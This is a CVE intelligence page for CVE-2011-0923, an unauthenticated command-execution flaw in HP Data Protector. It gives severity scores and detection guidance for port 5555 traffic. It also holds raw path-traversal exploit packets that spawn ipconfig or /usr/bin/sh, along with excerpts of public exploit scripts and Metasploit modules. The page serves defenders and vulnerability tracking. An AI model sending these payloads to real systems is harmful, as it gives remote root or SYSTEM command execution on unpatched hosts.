CVE-2011-0923
published 2011-02-09CVE-2011-0923: The client in HP Data Protector does not properly validate EXEC_CMD arguments, which allows remote attackers to execute arbitrary Perl code via a crafted…
PriorityP276critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
81.08%
99.6th percentile
The client in HP Data Protector does not properly validate EXEC_CMD arguments, which allows remote attackers to execute arbitrary Perl code via a crafted command, related to the "local bin directory."
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x00\x00\x00\xa4\x20\x32\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x43\x00\x20\x32\x30\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x50\x6f\x63\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x5c\x77\x69\x6e\x64\x6f\x77\x73\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x5c\x69\x70\x63\x6f\x6e\x66\x69\x67\x2e\x65\x78\x65\x00\x00
bytes↗
\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00
- →Monitor TCP port 5555 for connections to the HP Data Protector omniinet service; exploit traffic targets this port exclusively. ↗
- →Detect EXEC_CMD packets containing path traversal sequences (e.g., '../../') in the payload sent to port 5555; the traversal is used to reach arbitrary binaries outside the Data Protector bin directory. ↗
- →On Linux/HP-UX targets, alert on EXEC_CMD packets that resolve to '/bin/sh' or '/usr/bin/sh' via traversal; this indicates an attempt to spawn a root shell. ↗
- →On Windows targets, detect EXEC_CMD packets referencing 'perl.exe' with inline '-esystem()' arguments; this is the technique used to bypass single-command-only restrictions and execute arbitrary commands. ↗
- →Flag omniinet.exe spawning unexpected child processes (e.g., cmd.exe, perl.exe, sh) as this indicates successful EXEC_CMD exploitation. ↗
- →Look for the 4-byte big-endian length prefix '\x00\x00\x00\xa4' at the start of TCP payloads on port 5555 combined with the '\x20\x32' opcode bytes as a signature for known EXEC_CMD exploit packets. ↗
- ·On Windows, omniinet.exe uses FindFirstFileW() to validate the filename before execution; if the file is not found, exploitation fails. Attackers must supply a valid path to an existing binary (e.g., perl.exe within the Data Protector install path). ↗
- ·The Windows EXEC_CMD variant cannot pass arguments directly to arbitrary binaries; the perl.exe trick is required to execute commands with parameters, as the base path begins under C:\. ↗
- ·The exploit is unauthenticated; no credentials are required to send a malicious EXEC_CMD packet to the omniinet service on port 5555. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HP Data Protector - Remote Command Execution
exploitdb·2013-08-07·CVSS 10.0
CVE-2011-0923 [CRITICAL] HP Data Protector - Remote Command Execution
HP Data Protector - Remote Command Execution
---
"""
HP Data Protector Arbitrary Remote Command Execution
This script allows to execute a command with an arbitrary number of
arguments. The trick calls 'perl.exe' interpreter installed with HP Data
Protector inside the directory {install_path}/bin/.
The main goal of the script is to bypass the limitation of executing only a
single command without any parameter, as provided by already existing
exploits. As shown below, it's possible to exploit the security issue in order
to run any command inside the target system.
Target OS:
Microsoft Windows
Tested Version:
HP Data Protector A.06.20
Usage:
exploit.py
Example:
exploit.py 192.168.1.1 5555 'dir c:\'
exploit.py 192.168.1.1 5555 'ipconfig /all'
exploit.py 192.168.1.1 5555 'net user userb
Exploit-DB
HP Data Protector 6.1 - EXEC_CMD Remote Code Execution (Metasploit)
exploitdb·2012-02-25
CVE-2011-0923 HP Data Protector 6.1 - EXEC_CMD Remote Code Execution (Metasploit)
HP Data Protector 6.1 - EXEC_CMD Remote Code Execution (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'HP Data Protector 6.1 EXEC_CMD Remote Code Execution',
'Description' => %q{
This exploit abuses a vulnerability in the HP Data Protector service. This
flaw allows an unauthenticated attacker to take advantage of the EXEC_CMD
command and traverse back to /bin/sh, this allows arbitrary remote code
execution under the context of root.
},
'Author' =>
[
'ch0ks', # poc
'c4an', # msf poc
'wireghoul' # Improved msf
],
'References' =>
Exploit-DB
HP Data Protector (Linux) - Remote Command Execution
exploitdb·2011-08-10·CVSS 10.0
CVE-2011-0923 [CRITICAL] HP Data Protector (Linux) - Remote Command Execution
HP Data Protector (Linux) - Remote Command Execution
---
#!/bin/bash
# Exploit Title: HP Data Protector Remote Root Shell for Linux
# Date: 2011-08-10
# Author: SZ
# Software Link:http://www8.hp.com/us/en/software/software-
# product.html?compURI=tcm:245-936920&pageTitle=data-protector
# Version: 0.9
# Tested on: HP-UX, Linux
# CVE: CVE-2011-0923
# Notes: ZDI-11-055
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/
# Document.jsp?objectID=c02781143
#
# Ported from HPUX to Linux: minor change /usr/bin/sh -> /bin/sh
# Ported to HPUX from fdisk's (@fdiskyou) Windows version.
# Windows version: http://www.exploit-db.com/exploits/17339/
#
[ $# -lt 3 ] && echo -en "Syntax: `basename ${0}` \n\n`basename ${0}` 10.2
Exploit-DB
HP Data Protector (HP-UX) - Remote Shell
exploitdb·2011-08-05·CVSS 10.0
CVE-2011-0923 [CRITICAL] HP Data Protector (HP-UX) - Remote Shell
HP Data Protector (HP-UX) - Remote Shell
---
#!/bin/bash
# Exploit Title: HP Data Protector Remote Shell for HPUX
# Date: 2011-08-02
# Author: Adrian Puente Z.
# Software Link:http://www8.hp.com/us/en/software/software-
# product.html?compURI=tcm:245-936920&pageTitle=data-protector
# Version: 0.9
# Tested on: HPUX
# CVE: CVE-2011-0923
# Notes: ZDI-11-055
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/
# Document.jsp?objectID=c02781143
#
# Powered by Hackarandas www.hackarandas.com
# Reachme at ch0ks _at_ hackarandas _dot_ com || @ch0ks
# Lots of thanks to David Llorens (@c4an) for all the help.
# Ported to HPUX from fdisk's (@fdiskyou) Windows version.
# Windows version: http://www.exploit-db.com/exploits
Exploit-DB
HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution
exploitdb·2011-05-28·CVSS 10.0
CVE-2011-0923 [CRITICAL] HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution
HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution
---
# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability PoC (ZDI-11-055)
# Date: 2011-05-28
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 6.11
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0923
# Notes: ZDI-11-055
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
#
# Greetz to all the Exploit-DB Dev Team.
import socket
import sys
if len(sys.argv) != 3:
print "Usage: ./ZDI-11-055.py "
sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
# The following PoC takes advantage of a Directory Path Traversal to execute ipconfig.exe on the remote host.
# Tw
Metasploit
HP Data Protector 6 EXEC_CMD Remote Code Execution
metasploit
HP Data Protector 6 EXEC_CMD Remote Code Execution
HP Data Protector 6 EXEC_CMD Remote Code Execution
This exploit abuses a vulnerability in the HP Data Protector service. This flaw allows an unauthenticated attacker to take advantage of the EXEC_CMD command and traverse back to /bin/sh, this allows arbitrary remote code execution under the context of root.
Metasploit
HP Data Protector 6.1 EXEC_CMD Command Execution
metasploit
HP Data Protector 6.1 EXEC_CMD Command Execution
HP Data Protector 6.1 EXEC_CMD Command Execution
This module exploits HP Data Protector's omniinet process, specifically against a Windows setup. When an EXEC_CMD packet is sent, omniinet.exe will attempt to look for that user-supplied filename with kernel32!FindFirstFileW(). If the file is found, the process will then go ahead execute it with CreateProcess() under a new thread. If the filename isn't found, FindFirstFileW() will throw an error (0x03), and then bails early without triggering CreateProcess(). Because of these behaviors, if you try to supply an argument, FindFirstFileW() will look at that as part of the filename, and then bail. Please note that when you specify the 'CMD' option, the base path begins under C:\.
No writeups or analysis indexed.
http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-hphttp://marc.info/?l=bugtraq&m=130391284726795&w=2http://securityreason.com/securityalert/8261http://securityreason.com/securityalert/8323http://securityreason.com/securityalert/8329http://www.securityfocus.com/bid/46234http://www.vupen.com/english/advisories/2011/0308http://zerodayinitiative.com/advisories/ZDI-11-055/http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-hphttp://marc.info/?l=bugtraq&m=130391284726795&w=2http://securityreason.com/securityalert/8261http://securityreason.com/securityalert/8323http://securityreason.com/securityalert/8329http://www.securityfocus.com/bid/46234http://www.vupen.com/english/advisories/2011/0308http://zerodayinitiative.com/advisories/ZDI-11-055/
2011-02-09
Published